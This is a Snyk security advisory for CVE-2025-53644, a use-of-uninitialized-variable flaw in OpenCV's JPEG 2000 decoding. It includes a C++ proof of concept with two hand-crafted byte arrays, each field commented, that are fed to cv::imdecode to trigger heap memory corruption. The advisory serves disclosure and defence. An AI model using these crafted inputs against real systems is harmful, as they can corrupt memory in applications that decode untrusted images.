Use of Uninitialized Variable Affecting opencv package, versions [0,]
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-CONAN-OPENCV-10775456
- published18 Jul 2025
- disclosed17 Jul 2025
- creditJaroslav Lobačevski
Introduced: 17 Jul 2025
NewCVE-2025-53644 (opens in a new tab)How to fix?
A fix was pushed into the master branch but not yet published.
Overview
Affected versions of this package are vulnerable to Use of Uninitialized Variable via the opj_jp2_read_header component when reading crafted JPEG images. An attacker can achieve arbitrary heap buffer writes by supplying specially crafted JPEG files.
PoC
#include <opencv2/opencv.hpp>
#include <opencv2/imgcodecs/legacy/constants_c.h>
static void decode(const uint8_t* data, size_t size) {
std::vector<uint8_t> image_data = {data, data + size};
cv::Mat data_matrix =
cv::Mat(1, image_data.size(), CV_8UC1, image_data.data());
cv::Mat decoded_matrix = cv::imdecode(data_matrix, CV_LOAD_IMAGE_UNCHANGED);
}
int main() {
const uint8_t data1[] = {0xff,0x4f, // SOC marker
0xff,0x51, // SIZ marker
0x00,0x29, // Size with marker 41
0x01,0x05,// Rsiz (capabilities)
0x00,0x00,0x0a,0xa2, // Xsiz
0x00,0x01,0xeb,0xb8, // Ysiz
0x00,0x00,0x00,0x33, // XOsiz
0x00,0x00,0x41,0x80, // YOsiz
0x00,0x0b,0x00,0x03, // XTsiz
0x2a,0xb9,0xd1,0x4d, // YTsiz
0x00,0x00,0x00,0x21, // XTOsiz
0x00,0x00,0x0f,0xf5, // YTOsiz
0x00,0x01, // Csiz
0x07, // Ssiz_0
0x0a, // XRsiz_0
0x37, // YRsiz_0
0xff,0x52, // COD marker
0x00,0x0d, // Size with marker 13
0x05, // Scod
0x00, // SGcod (A)
0x00,0x11, // SGcod (B)
0x00, // SGcod (C)
0x00, // SPcod (D) / SPcoc (A)
0x04, // SPcod (E) / SPcoc (B)
0x04, // SPcod (F) / SPcoc (C)
0x2c, // SPcod (G) / SPcoc (D)
0x01, // SPcod (H) / SPcoc (E)
0x86, // SPcod (I_i) / SPcoc (F_i)
0xff,0x5c, // QCD marker
0x00,0x04, // Size with marker 4
0x60, // Sqcx
0xb7, // SPqcx_0
0xff,0x90, // SOT marker
0x00,0x0a, // Size with marker 10
0x00,0x00, // Isot
0x00,0x00,0x00,0x00, // Psot
0x00, // TPsot
0x76, // TNsot
0xff,0x93, // SOD marker
0x00,0x00 // last invalid marker
};
const uint8_t data2[] = {0x00,0x00,0x00,0x0c,0x6a,0x50,0x20,0x20,0x0d,0x0a,0x87,0x0a, // signature
0x00,0x00,0x00,0x14, // box length 20
0x66,0x74,0x79,0x70, // box: file type
0x6a,0x70,0x30,0x20, // BR
0xf9,0xff,0xff,0xff, // MinV
0x6a,0x70,0x33,0x20, // CLi
0x00,0x00,0x00,0x31, // box length 49
0x6a,0x70,0x32,0x68, // box: JP2 Header
0x00,0x00,0x00,0x16, // box length 22
0x69,0x68,0x64,0x72, // box: Image Header
0x00,0x80,0x00,0x00, // Height
0x00,0x00,0x05,0x00, // Width
0x00,0x03, // NC (number of components)
0x07, // BPC
0x07, // C
0x00, // UnkC
0x00, // IPR
0x00,0x00,0x00,0x13, // box length 19
0x63,0x6f,0x6c,0x72, // box: Color Specification
0x02, // Meth
0xff, // PRECEDENCE
0xff, // APPROX
0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08, // icc values
};
decode(data1, sizeof(data1));
decode(data2, sizeof(data2));
decode(data2, sizeof(data2));
decode(data1, sizeof(data1));
decode(data2, sizeof(data2));
return 0;
}